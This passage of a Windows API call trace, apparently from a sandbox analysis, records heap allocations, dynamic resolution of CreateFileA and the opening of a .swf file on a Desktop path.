lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0075.523] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0075.523] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690900 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.524] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908d0 | out: hHeap=0x650000) returned 1 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.524] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ab68 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0075.524] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908d0 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.524] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3a8 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.524] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0075.524] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0075.525] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.525] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0075.525] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e078 [0075.525] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.525] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.525] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.526] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0075.526] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.527] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e678 [0075.527] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.527] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.527] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696ad0 [0075.527] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0075.527] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906b0 | out: hHeap=0x650000) returned 1 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906b0 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.527] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.527] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690970 | out: hHeap=0x650000) returned 1 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690970 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.528] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.528] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.529] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906c0 | out: hHeap=0x650000) returned 1 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906c0 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.529] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.529] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.529] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.529] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.529] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.529] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.529] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.529] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.529] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.530] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.530] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.530] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0075.531] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.531] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0075.531] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb) returned 0x76e588 [0075.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x76e588, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0075.531] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.531] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFile") returned 0x0 [0075.531] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.531] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.531] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.531] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.531] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.531] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.531] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e588 [0075.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x76e588, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0075.532] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.532] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0075.532] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e600 | out: hHeap=0x650000) returned 1 [0075.532] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.532] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.532] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10001) returned 0x771fe8 [0075.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0075.532] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x48) returned 0x76f100 [0075.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", cchWideChar=72, lpMultiByteStr=0x76f100, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf", lpUsedDefaultChar=0x0) returned 72 [0075.532] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f100 | out: hHeap=0x650000) returned 1 [0075.532] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0075.532] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0075.533] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0075.533] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.533] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.533] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.533] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.533] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0075.533] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-bwohngaeohzwnbtd\\wwhoeeriour.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e600 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.533] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.533] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690920 | out: hHeap=0x650000) returned 1 [0075.533] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.533] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690920 [0075.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=72, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x698600 [0075.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x771fe8, cbMultiByte=72, lpWideCharStr=0x698600, cchWideChar=72 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\WWhoeERioUR.swf") returned 72 [0075.534] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x698698 [0075.534] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698600 | out: hHeap=0x650000) returned 1 [0075.534] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0075.534] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0075.534] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0075.534] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0075.534] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 